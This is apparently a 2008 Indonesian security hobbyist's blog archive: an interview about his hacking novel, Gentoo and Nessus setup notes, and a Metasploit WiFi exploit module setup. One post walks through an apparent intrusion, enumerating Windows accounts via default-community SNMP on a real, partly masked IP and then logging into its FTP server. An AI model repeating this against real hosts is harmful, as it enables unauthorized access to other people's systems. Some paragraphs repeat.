baca di http://ezine.echo.or.id/interview-komunitas.txt
Usulan artikel harus dikirimkan ke ezine@echo.or.id
================
Important dates:
* submission deadline ......................... 29 Juli 2008
* author release .............................. 02 Agustus 2008
* public release .............................. 08 Agustus 2008
Salam,
echo|zine editor-in-chief®
Wednesday, May 28, 2008
Interview \\ y3dips \\
Ini adalah interview gw yang di lakukan oleh poni (salah satu member yogyafree) dan di rilis pada edisi ke 9 majalah elektronik yang di terbitkan oleh yogyafree dan bisa di donlod di sini, maaf jika terkesan narcis :P, hehehe Berikut interviewnya (majalah elektronik yogyafree, "Interview \\ y3dips \\" halaman 17-19)
Nama salah satu senior di dunia TI seperti y3dips , Founder komunitas e-c-h-o (www.echo.or.id / http://e-rdc.org) tentunya sudah tidak asing lagi di telinga penggiat hacking dan sekuriti. Berikut ini adalah hasil wawancara team X Code dengan y3dips.
Salam, kami dari team X Code / Yogyafree / Yogya Family Code bermaksud mewawancarai saudara. Terima kasih untuk waktu dan kesediaan anda menjawab beberapa pertanyaan dari kami.
[Q] Pertama-tama, Kami ingin mengucapkan selamat kepada anda untuk Karya yang telah dipublikasikan oleh penerbit Jasakom. Sebuah novel yang memberikan nuansa baru dalam dunia hacking dan sekuriti "HACKER. its not about BLACK or WHITE". Bagaimana kesan anda secara pribadi terhadap buku ini?
[y3dips] Terima kasih banyak, sebenarnya saya cukup kaget dengan sambutan yang diberikan oleh teman-teman semua atas buku ini, Dan cukup bahagia atas semua tanggapan yang ada. Saya cukup puas, maklum ini baru buku pertama saya.
[Q]Bagaimana sih awalnya ide untuk menulis buku ini?
[y3dips] Menulis sebuah buku sebenarnya sudah merupakan salah satu cita-cita saya,mengapa? karena dengan menulis sebuah buku maka kesempatan kita untuk berbagi akan lebih luas lagi, dibanding media seminar dsb. Ide tentang buku ini sebenarnya pengalaman pribadi bahwa membaca cerita baik komik, novel dsb yang di sampaikan secara ringan dan sederhana itu lebih mudah di cerna dan memberikan rasa santai kepada pembaca, kebetulan beberapa tahun yang lalu "kepincut" dengan buku terbitan syngress yang sudah 4 seri yaitu "how to own series", cuma memang dibuku itu teknik-teknik yang dibahas juga sudah relatif cukup tinggi, tetapi ide penyampaian yang digunakan dengan cara meramu teknik hacking dalam sebuah kisah itulah yang coba saya terapkan di buku saya.
[Q] Anda tentu mendapatkan banyak respon dari pembaca. Saran dan kritik seperti apa sih yang paling banyak anda dapatkan?
[y3dips] Beragam sekali, paling banyak sih ucapan pemberi semangat yah, dan emang itu yang kita butuhkan serta masukan-masukan berarti yang selama ini hanya terbersit atau tak pernah terpikirkan oleh saya :) yang jelas menulis buku itu menyenangkan :)
[Q] Apakah saat ini anda mempunyai rencana untuk menulis buku lagi?Kalau ada, bisakah anda memberikan sedikit bocoran?
[y3dips] Ada, rencananya buku kedua yang merupakan lanjutan dari kisah indi60 (hacker: its not about black or white), dan sudah saya mulai awal tahun ini. Bocorannya, hmm apa yah :p, indi60 sudah 17 taun :P .. hehehe yang jelas akan lebih seru lagi, Mungkin secara teknik akan lebih banyak peningkatan yah, hmm pokoknya tunggu aja n doakan cepat selesai :), mau kasih masukan ? silahkan ke http://indi60.wordpress.com , hehehehe :P
[Q] OK. Kita beralih ke masalah sekuriti di Indonesia. Bagaimana menurut anda perkembangan komunitas TI Underground dari tahun ke tahun?
[y3dips] Wah repot yah, soalnya kalo underground seharusnya ga ketauan :P, kan underground ... hehehe. Tapi secara umum, komunitas IT Security di Indonesia Semakin matang dan dewasa dibanding saat saya mulai terjun kedunia ini :), semakin banyak riset yang dilakukan, Kelompok-kelompok yang semakin rapi dan terorganisir dengan baik, punya visi misi serta tujuan membangun, Walau disayangkan masih ada motif yang bersifat
negatif tetapi mudah-mudahan itu bisa menjadi sarana untuk mendewasakan Kalangan IT security dan underground khususnya dan keseluruhan masyarakat pada umumnya.
[Q] Jika kita amati secara seksama baik melalui chat room di irc, situs, milis, forum dll. User awam umumnya selalu mengidentik Hacker dengan "deface", "carding", dan "menginjeksi server". Padahal hacking itu sebenarnya sangat luas. Bagaimana pendapat anda mengenai pandangan mereka?
[y3dips] Orang awam berpendapat seperti itu dipengaruhi oleh media baik lokal maupun internasional. Yang baik saja bisa jadi buruk jika sudah di"modifikasi" oleh media :) Sekarang adalah bagaimana cara kita untuk memberikan pandangan yang imbang buat khalayak ramai, biar mereka bisa menilai secara luas, caranya silahkan dipilih masing-masing :), terus terang itu yang coba saya lakukan di buku saya. Gampangnya seperti ini, ada seorang guru yang membunuh, lalu apakah profesi guru itu buruk ? dan setiap guru di cap pembunuh. :)
[Q] Apakah anda pernah ditawari oleh pihak-pihak tertentu untuk melakukan penetrasi ke sistem badan usaha atau lembaga lain secara ilegal(tentunya dengan bayaran)?Kalau iya, bagaimana respon anda?
[y3dips] Pernah, sering bahkan :) hehehe "if i told you, i have to kill you" :P Anggap saja angin lalu, kalo dari pihak yang bukan pemilik :) , kecuali dari pihak yang memiliki badan usaha/lembaga itu sendiri yang meminta dengan motif yang jelas :)
[Q] Pernahkah anda terjebak secara tidak sengaja seperti yang terjadi pada "Arik" dalam buku karangan anda?
[y3dips] Alhamdulillah belum pernah, tetapi ada loh teman-teman yang pernah, dan itu kisah nyata dari seorang teman :) ada yang bilang orang bodoh kalah sama orang pintar, pintar kalah sama yang cerdas, cerdas kalah sama yang licik :)
INGAT!!! bukan berarti saya anjurkan jadi orang licik ya ... hahahaha :)
[Q] Ok deh. kita sekarang ngobrol santai aja. Apa aja kegiatan anda sekarang?
[y3dips] Kerja cari duit untuk hidup, ngoprek komputer sekuatnya (jika tidak ya nonton tipi, film,maen game) selebihnya menjalani hidup seperti kamu juga, makan, tidur dan beribadah
[Q] Punya kegemaran baru nga? seperti olahraga, games, music dll?
[y3dips] Sebenarnya bukan baru, cuma baru terfasilitasi aja, Maen futsall 2 minggu sekali :) .Dulu suka maen band, cuma sayang sejak bekerja, member band lain sudah terpencar-pencar
[Q] Bagaimana sih cara menggoreng telur yang baik menurut y3dips?
[y3dips] Jangan di goreng dengan minyak tanah :P
[Q] Sekali lagi ini adalah pertanyaan serius yang santai dan sangat membosankan.Kami hanya berharap y3dips mempunyai versi update dari pertanyaan ini. "Bagaimana saran anda untuk semua penggiat hacking dan sekuriti agar bisa belajar secara terarah?"
[y3dips] Salah satu kelemahan yang dimiliki oleh kita umumnya adalah kemalasan, khususnya untuk membaca, Sedangkan untuk menjadi terarah itu agak sulit apabila kita tidak menyukainya, JAdi tinggal pilih apakah membuat yang anda pelajari menjadi yang anda sukai atau mempelajari yang anda sukai :) Satu lagi, sebaiknya selalu sertai dengan praktek , baik networking, programming, desain dsb :)
[Q] :) satu pertanyaan terakhir .Pernah membaca majalah X Code? bagaimana pendapat, saran dan kritik anda?
[y3dips] Pernah, kalo tidak salah pada awal dibuat, seorang teman memberitahukan saya :) . Pertahankan, cukup sulit untuk membuat suatu karya apalagi majalah komputer/underground yang gratis dan berkualitas tetapi lebih sulit lagi mempertahankannya :) so, tetap semangat :)
[Q] Ini bukan pertanyaan. Tapi permintaan. Maukah anda menulis artikel untuk majalah kami?terima kasih
[y3dips] Saya menjawab "Mau", tapi tidak berjanji :) FYI: Saya akhir-akhir ini sedang kesulitan untuk meluangkan waktu khusus untuk menulis artikel teknis secara murni, lain halnya jika berupa ulasan seperti yang saya tulis di http://e-rdc.org. Jadi kasih kesempatan yang "muda-muda" deh, Hahahahaha.
yu ah mari(tm)
images are property of http://www.shadowhousepits.com.au
Tuesday, May 20, 2008
e-rdc jalur SSL

Untuk meningkatkan privasi dan meminimalisasi celah keamanan di jalur pengiriman khususnya bagi para pemilik login (tetaplah waspada terhadap serangan ARP spoofing yang di kombinasikan dengan sertifikat SSL palsu ) :), maka barusan ini saya buatkan jalur SSL untuk situs e-rdc.org. Prosesnya sedikit rumit karena saya terpaksa harus membuatkan skrip serta mengkonfigurasikan kembali fitur "enkripsi" untuk mengamankan file konfigurasi.
Baiklah, Untuk Para Rangers dan Strangers semuanya, Selamat menikmati .. Go..Go!
images are property of http://www.wingimp.org
Monday, May 19, 2008
We Are ..
Wednesday, May 14, 2008
1Ciddish pwn1ng a winb0x

This is a simple scenario that would reveal :), Some machine has unconfigure snmp, so a bad guy can "walking" on his snmp request with OID to obtain the list of lanman users .. tadda
devil@venom ~ $ sudo snmpwalk -v 1 -c public 202.x.155.x OIDGOt username? try some remote connection services,
STRING: "Guest"
STRING: "ASPNET"
STRING: "angely"
STRING: "SQLDebugger"
STRING: "Administrator"
STRING: "TsInternetUser"
STRING: "IUSR_SCC-ZR574A805WI"
STRING: "IWAM_SCC-ZR574A805WI"
devil@venom ~ $ nmap -vv 202.x.155.x -p 20-25 | grep openMost way, uname/passwd.. and tadda
Discovered open port 21/tcp on 202.x.155.x
Discovered open port 25/tcp on 202.x.155.x
21/tcp open ftp
25/tcp open smtp
devil@venom ~ $
devil@venom ~ $ ftpKids, (only)just try this at home. ?Yeah, well it just on another daily boring "working" days,
ftp> o 202.x.155.x
Connected to 202.x.155.x(202.x.155.x).
220 ANGSRV Microsoft FTP Service (Version 5.0).
Name (202.x.155.x:devil): angely
500 'AUTH SSL': command not understood
SSL not available
331 Password required for angely.
Password:
230 User angely logged in.
Remote system type is Windows.
ftp> bye
221
new technique? not really... just lucky
images are property of http://www.sdm-net.org
Tuesday, May 06, 2008
Gentoo Wvdial, Segmentation Fault

Ive found this error (segmentation fault, hmm.. sound interesting :P) when using wvdial to connect to the internet (which never happen before i upgrading my machine)..
$ wvdial
--> WvDial: Internet dialer version 1.60
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Sending: AT+CGDCONT=1,"IP","indosatgprs"
AT+CGDCONT=1,"IP","indosatgprs"
OK
--> Modem initialized.
Segmentation fault.
After googling and hunting, ive found out that some people has a same problem with me, and also at the right place to check about gentoo bugs (206579) also the patch that ive already use 218504 and the one that i develop arent working :(.
Ive already patch the wvstream, using this patch (carefull in using the patch, u have to put it in ebuild, because if u dont do so then after u re-emerge, the patch wont work) and rebuild wvdial, wvstreams, ppp, glibc and gcc (some friends said this is a bug in gentoo's glibc package, but the toolchain guys still not responding about it). So, now im still using pon (pppconfig) to connect to internet using my Claymore.
Somebody could help? :)
images taken from http://avionhelico.chez-alice.fr
Thursday, April 17, 2008
gentoo-synce with my xcalibur

Yeah, At last! it never work on fedora, ubuntu and other distros that i ever use ( or it because i never do compiling (try) to install it on some other distros (no need to ?)) but with this instruction and some luck, now my XDA got detected and sync with my gentoo using SyncE
FYI, the instruction; u need to build a python module and python-setuptools first (our you would find a hard time with one-by-one install it later).. carefull, u have to do some kernel re-compile, dbus modification (installation) and other thrilling thing, but no problem .. its gentoo anyway(GNU/linux)!

please check the interface (rndis0) and ping it, now you are ready to do ICS, or whatever :d (installing some daemon on xcalibur ?)

Beatiful isnt it ? hshh
Enjoy (tm)
Tuesday, April 15, 2008
Phrack issue #65 are out
Introduction
Phrack Prophile on The UNIX Terrorist
Phrack World News
Stealth Hooking: another way to subvert the Windows kernel
Clawing holes in NAT with UPnP
The only laws on Internet are assembly and RFCs
System Management Mode Hacks
Mystifying the debugger for ultimate
Australian Restricted Defense Networks and FISSO
phook - The PEB Hooker
Hacking the $49 Wifi Finder
The art of exploitation: Technical analysis of Samba WINS overflow
The Underground Myth
Hacking your brain: Artificial Conciousness
International Scenes
ive already made simple review here
Enjoy the magazine
Quote : anonymous - "the underground myth" - phile 13
"Today's youth, for the most part, have no true understanding of hackers or hacking. They have no knowledge of the history, no knowledge that a history even exists. Their hacker is the media's hacker, the cyber terrorist, the Russian mafia. This is unfortunate, but the real trouble begins for those few that somehow become interested enough to look a bit deeper."
Sunday, March 02, 2008
Back To Web Design/Programming
This week, Im collaborating with az001 to rebuild echo.or.id homepage, Az develop the code (thx to the_day for creating rss for echo`s forum) and i just made the whole design. The basic idea is giving the whole echo community door through the first page (for now, only cover e-rdc security news/journal, echo forum and echo mailing list at !yahoogroups). You can see the screenshot below, or just go to echo portal.

After 2 hour designing the page and publish the page, i realize that e-rdc Rss was not fully supported by rss parser that Az develop (also for rss reader like Newsfox, probably general for all rss reader), after "hacking" php-fusion code for a while i patch the RSS file to support "timestamp" that generally used by rss parser.
Just add this one line into print out function, after echo "[item]\n

and, then the date will perfectly being parsed and display.

thats all folk, enjoy!

After 2 hour designing the page and publish the page, i realize that e-rdc Rss was not fully supported by rss parser that Az develop (also for rss reader like Newsfox, probably general for all rss reader), after "hacking" php-fusion code for a while i patch the RSS file to support "timestamp" that generally used by rss parser.
Just add this one line into print out function, after echo "[item]\n

and, then the date will perfectly being parsed and display.

thats all folk, enjoy!
Wednesday, February 27, 2008
Lorcon module, metasploit, & wifi
Hello everybody, this time we will try to exploit wifi environtment with metasploit, yup.. since Metasploit framework version 3.0, its already includes three exploit modules that exploit WiFi driver vulnerabilities in the Windows kernel, also a handful of auxiliary modules that included and trigger denial of service conditions in WiFi drivers across a variety of platforms.
So, here we go ..
First, I try to run an auxiliary modules that DOS the wifi client

but its failed. So, lets try to exploit a target with windows broadcomm wifi driver

Yes, its also failed. I never use it before, thats why i never configure the external module under the Framework directory (the truth is, i never had enough time to play more with metasploit .. **blah** )
So, here is the rundown step.
1. install the lorcon module, Lorcon is a generic library for injecting 802.11 frames, capable of injection via multiple driver frameworks, without forcing modification of the application code.U can use it also with kismet and wireshark.
get the latest version and compile it
2. Compile the ruby lorcon module under framework-3.1/external/ruby-lorcon, see README for installation step, and copy the Lorcon.so file to /usr/lib/ruby/site_ruby/1.8/i686-linux/
3. if you use gentoo, make sure to rebuild the library first with revdep-rebuild (i need to do this)
And then,

enjoy(tm), hope it helps..
So, here we go ..
First, I try to run an auxiliary modules that DOS the wifi client

but its failed. So, lets try to exploit a target with windows broadcomm wifi driver

Yes, its also failed. I never use it before, thats why i never configure the external module under the Framework directory (the truth is, i never had enough time to play more with metasploit .. **blah** )
So, here is the rundown step.
1. install the lorcon module, Lorcon is a generic library for injecting 802.11 frames, capable of injection via multiple driver frameworks, without forcing modification of the application code.U can use it also with kismet and wireshark.
get the latest version and compile it
$svn co https://802.11ninja.net/svn/lorcon/trunk/ lorcon2. Compile the ruby lorcon module under framework-3.1/external/ruby-lorcon, see README for installation step, and copy the Lorcon.so file to /usr/lib/ruby/site_ruby/1.8/i686-linux/
3. if you use gentoo, make sure to rebuild the library first with revdep-rebuild (i need to do this)
And then,

enjoy(tm), hope it helps..
Friday, February 22, 2008
My first Apps for Ipod touch
After more than a week (more than 7 times in building it, yes i have to work, sleep, eat, vacation :P) im trying to build a toolchain to enable development for the Apple iPhone and other embedded devices (based on the ARM/Darwin platform). At last, yesterday i`m able to install and using it to compile a simple Hello World application for my ex1a, most of the time are spending to download LLVM, Mac OS X header (Download the Xcode DMG from Apple's Developer Tools download page.) which is the size are almost 1 GB, and then troubleshooting the library, also some errors because of broken iphone filesystem :( , for some helpfull instruction u can go through this site.
And here are the screenshot ...

Im building it under my Gentoo linux Operating system, and here are compiling Hello World Application before uploading it to a repository ...

Thats All folk, enjoy(tm)
And here are the screenshot ...

Im building it under my Gentoo linux Operating system, and here are compiling Hello World Application before uploading it to a repository ...

Thats All folk, enjoy(tm)
Wednesday, February 20, 2008
Gentoo, Nessus 3.0.6 and .ebuild

I never try nessus on gentoo (last time i check :P, im using it under ubuntu), i just emerge it before and never run it. Yesterday, when i was trying to run nessus, ive found that it suck all my CPU, the process are so slow even my cursor are in slow motion :D, even for loging in my nessus-client to the localhost nessus server. The unbelieveable part was the "top" output from my gentoo, it suck my CPU 101%, wtf..

so i check the nessus version that im running, im still running nessus version 2.2.6, which is reported still has a bug on it not only in memory handling but it cant be use to scan et all (blah...) , so i decide to remove it (unmerge) and then install the fancy "nessus-client" version 1.0.2 and nessus-bin version 3.0.5 (as its listed on emerge --search). FYI, Gentoo using suse package (sad, they dont make it for gentoo, hell yeah.. who cares :P) then converted it using the rpm, but the problem is when i try to emerge nessus-bin, the nessus already updated to newer version, which is 3.0.6 and the ebuild are for nessus version 3.0.5, with a little effort i figure out how to make this new version works on your gentoo. follow this step to hack the ebuild files and successfuly install the nessus
1. grab a copy of newer nessus, im using suse version > Nessus-3.0.6-suse10.0.i586.rpm
and put it on /usr/portage/distfiles
2. i need to make a symbolic link some library, because it still using the lower version (mine is newer), u can pass this step if your libssl and libcrypto already 0.9.7 version.
sudo ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
sudo ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.73. edit your nessus-bin ebuild at /usr/portage/net-analyzer/nessus-bin
change the ebuild name from nessus-bin-3.0.5.ebuild to nessus-bin-3.0.6.ebuild
and tweak some part of the header, also the Manifest files (modify the signature)for an easy way , ive already created the ebuild for nessus-bin version 3.0.6 , you all can grab it here. extract and copy all the folder under directory /usr/portage/net-analyzer/
4. Final step, just do the magic command "emerge nessus-bin" and you will get a nessus-bin 3.0.6

thats all folk, enjoy your nessus! Be Safe :)
Subscribe to:
Posts (Atom)


